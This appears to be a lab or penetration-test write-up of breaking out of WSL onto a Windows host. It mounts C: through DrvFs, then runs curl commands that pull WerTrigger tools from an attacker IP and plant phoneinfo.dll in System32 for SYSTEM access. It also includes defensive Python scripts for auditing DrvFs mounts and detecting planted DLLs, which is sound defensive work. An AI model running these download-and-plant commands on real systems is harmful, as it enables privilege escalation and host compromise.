WSL Breakout


System-level compromise has been achieved on the WSL environment of the DEV-DATASCI-JUP (10.10.232.68) host. Attempting to break out of the WSL environment onto the Windows host.

/mnt/c


root@DEV-DATASCI-JUP:/# ll /mnt/c
total 0
drwxrwxrwx 1 root root 4096 Aug 25  2022 ./
drwxr-xr-x 1 root root 4096 Aug 25  2022 ../

Checking the /mnt/c directory reveals that it is empty. This is the directory that the C:\ drive normally gets mounted to.

An online resource reveals that the host filesystem can be mounted from within the WSL environment.

The official Microsoft documentation shows that DrvFs is a filesystem plugin for WSL that exposes the Windows filesystem (NTFS) inside the Linux environment.

Mounting


root@DEV-DATASCI-JUP:/mnt# mount -t drvfs C: /mnt/c
root@DEV-DATASCI-JUP:/mnt# cd c ; ll
ls: cannot read symbolic link 'Documents and Settings': Permission denied
ls: cannot access 'pagefile.sys': Permission denied
ls: 'System Volume Information': Permission denied
total 0
drwxrwxrwx 1 root root 4096 Aug 25  2022 $Recycle.Bin/
drwxrwxrwx 1 root root 4096 Mar 14  2023 ./
drwxr-xr-x 1 root root 4096 Aug 25  2022 ../
lrwxrwxrwx 1 root root   12 Aug 25  2022 Documents and Settings
drwxrwxrwx 1 root root 4096 Aug 25  2022 PerfLogs/
drwxrwxrwx 1 root root 4096 Aug 25  2022 Program Files/
drwxrwxrwx 1 root root 4096 Aug 25  2022 Program Files (x86)/
drwxrwxrwx 1 root root 4096 Mar 13  2023 ProgramData/
drwxrwxrwx 1 root root 4096 Aug 25  2022 Recovery/
d--x--x--x 1 root root 4096 Aug 25  2022 System Volume Information/
drwxrwxrwx 1 root root 4096 Aug 25  2022 Users/
drwxrwxrwx 1 root root 4096 Mar 13  2023 Windows/
drwxrwxrwx 1 root root 4096 Aug 25  2022 datasci-team/
-????????? ? ?    ?       ?            ? pagefile.sys

Mounting successful. Privileged read and write access to the Windows filesystem is granted. Note that the 777 modes shown are DrvFs defaults rather than real NTFS permissions; actual access is decided by the Windows account that launched WSL, which is why pagefile.sys and System Volume Information are still denied.
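From the defender's side, the mount above is visible from inside the distribution: /proc/mounts lists every DrvFs-backed mount, as the WSL1 filesystem type drvfs or, on WSL2, as a 9p transport whose options carry aname=drvfs. The following audit script is an added example, not code from the write-up; the /proc/mounts content it parses is constructed inline and the helper names (parse_mounts, writable_mounts, unescape) are my own.

```python
"""Audit DrvFs mounts inside a WSL distribution.

Added example (not from the write-up). Parses /proc/mounts and reports every
mount that exposes a Windows drive through DrvFs, whether as the WSL1 'drvfs'
filesystem type or as the WSL2 9p transport with aname=drvfs in its options.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample of /proc/mounts content: one WSL1-style entry, two
# WSL2-style entries and unrelated mounts. As in the real file, backslash
# and space inside a field are octal-escaped (\134 and \040).
SAMPLE_PROC_MOUNTS = """\
rootfs / lxfs rw,noatime 0 0
none /dev tmpfs rw,noatime,mode=755 0 0
C:\\134 /mnt/c drvfs rw,noatime,uid=1000,gid=1000,case=off 0 0
C:\\134 /mnt/c 9p rw,noatime,dirsync,aname=drvfs;path=C:\\134;uid=0;gid=0;symlinkroot=/mnt/,mmap,access=client,msize=65536,trans=fd,rfd=8,wfd=8 0 0
D:\\134 /mnt/d 9p ro,noatime,dirsync,aname=drvfs;path=D:\\134;uid=1000;gid=1000,access=client 0 0
tools /mnt/wsl/tools 9p rw,noatime,aname=tools,access=client 0 0
/dev/sdc /mnt/data\\040disk ext4 rw,relatime 0 0
"""

_OCTAL = re.compile(r"\\([0-7]{3})")


def unescape(field: str) -> str:
    """Decode the \\ooo octal escapes /proc/mounts uses for special characters."""
    return _OCTAL.sub(lambda m: chr(int(m.group(1), 8)), field)


@dataclass
class DrvfsMount:
    source: str          # Windows path, e.g. C:\
    target: str          # Linux mount point
    fstype: str          # 'drvfs' (WSL1) or '9p' (WSL2)
    writable: bool       # first mount option is 'rw'
    uid: Optional[int]   # Linux uid the Windows files are presented as, if set


def parse_mounts(text: str) -> List[DrvfsMount]:
    """Return every DrvFs-backed mount found in /proc/mounts-formatted text."""
    found: List[DrvfsMount] = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        source, target, fstype, opts = parts[:4]
        # Options are comma-separated; WSL2 nests the DrvFs settings after
        # 'aname=drvfs' using ';' as a separator, so split on both.
        opt_list = re.split(r"[,;]", opts)
        is_drvfs = fstype == "drvfs" or (fstype == "9p" and "aname=drvfs" in opt_list)
        if not is_drvfs:
            continue
        uid: Optional[int] = None
        for opt in opt_list:
            if opt.startswith("uid="):
                uid = int(opt[4:])
        found.append(DrvfsMount(unescape(source), unescape(target), fstype,
                                "rw" in opt_list, uid))
    return found


def writable_mounts(mounts: List[DrvfsMount]) -> List[DrvfsMount]:
    """The subset that gives Linux-side processes write access to a Windows drive."""
    return [m for m in mounts if m.writable]


def main() -> None:
    # On a live distribution, replace SAMPLE_PROC_MOUNTS with open("/proc/mounts").read().
    for m in parse_mounts(SAMPLE_PROC_MOUNTS):
        mode = "rw" if m.writable else "ro"
        print(f"{m.source} -> {m.target} ({m.fstype}, {mode}, uid={m.uid})")


if __name__ == "__main__":
    main()
```

Running this inside the distribution after the mount command above would list C:\ on /mnt/c as a writable DrvFs mount. Because WSL can mount the drive only with the rights of the Windows user who started it, an entry presented as uid=0 is not itself a finding; the useful signal is a DrvFs mount appearing where the distribution's automount configuration does not create one.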

WerTrigger


Privileged file write always leads to some form of DLL injection, since an administrator can write a DLL anywhere in the filesystem.

I will be using WerTrigger.

root@DEV-DATASCI-JUP:/mnt/c# mkdir tmp
root@DEV-DATASCI-JUP:/mnt/c# curl -s http://10.9.0.130/WerTrigger/bin/WerTrigger.exe -o tmp/WerTrigger.exe
root@DEV-DATASCI-JUP:/mnt/c# curl -s http://10.9.0.130/WerTrigger/bin/Report.wer -o tmp/Report.wer
 
root@DEV-DATASCI-JUP:/mnt/c# curl -s http://10.9.0.130/WerTrigger/bin/phoneinfo.dll -o Windows/System32/phoneinfo.dll

Delivering the exploit to the host system: phoneinfo.dll goes into the C:\Windows\System32 directory through the privileged file write.

Leveraging the existing SSH session from the earlier lateral movement to the host system, I can execute the WerTrigger.exe PE file. Exploit successful. System-level compromise.
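The drop of phoneinfo.dll into C:\Windows\System32 is the kind of change a file-integrity baseline catches. The script below is an added example, not part of the write-up: it builds a SHA-256 manifest of the DLLs under a directory and diffs a later manifest against it, so a planted or replaced DLL shows up as added or modified. The directory layout it checks is constructed in a temporary folder; build_manifest, diff_manifest and demo are names I chose for this example.

```python
"""Baseline-and-diff check for unexpected DLLs in a system directory.

Added example (not part of the write-up). On a real host the baseline would be
captured from a known-good image and the current manifest from
C:\\Windows\\System32; here a fake System32 is constructed in a temp folder.
"""
import hashlib
import os
import tempfile
from typing import Dict, List


def sha256_file(path: str) -> str:
    """Hash a file in chunks so large DLLs do not have to be read into memory at once."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: str, suffix: str = ".dll") -> Dict[str, str]:
    """Map each DLL path relative to root (lower-cased, as NTFS is case-insensitive) to its SHA-256."""
    manifest: Dict[str, str] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(suffix):
                full = os.path.join(dirpath, name)
                rel = os.path.relpath(full, root).replace(os.sep, "/").lower()
                manifest[rel] = sha256_file(full)
    return manifest


def diff_manifest(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, List[str]]:
    """Classify every DLL as added, removed or modified relative to the baseline."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(k for k in baseline.keys() & current.keys() if baseline[k] != current[k])
    return {"added": added, "removed": removed, "modified": modified}


def demo() -> Dict[str, List[str]]:
    """Constructed scenario: snapshot a fake System32, then plant one DLL and alter another."""
    with tempfile.TemporaryDirectory() as root:
        sys32 = os.path.join(root, "Windows", "System32")
        os.makedirs(sys32)
        # Fake contents; the .txt file is present to show non-DLL files are ignored.
        for name, body in (("kernel32.dll", b"MZ-original-1"),
                           ("ntdll.dll", b"MZ-original-2"),
                           ("notes.txt", b"ignored")):
            with open(os.path.join(sys32, name), "wb") as f:
                f.write(body)
        baseline = build_manifest(os.path.join(root, "Windows"))

        # Simulate the privileged write: a new DLL appears and an existing one changes.
        with open(os.path.join(sys32, "phoneinfo.dll"), "wb") as f:
            f.write(b"MZ-planted")
        with open(os.path.join(sys32, "ntdll.dll"), "wb") as f:
            f.write(b"MZ-tampered")
        current = build_manifest(os.path.join(root, "Windows"))
        return diff_manifest(baseline, current)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

A baseline diff is an after-the-fact check; for real-time coverage the same write would also surface as a file-creation event in System32 from a process that is not a Windows installer or servicing component, for example Sysmon Event ID 11 (FileCreate).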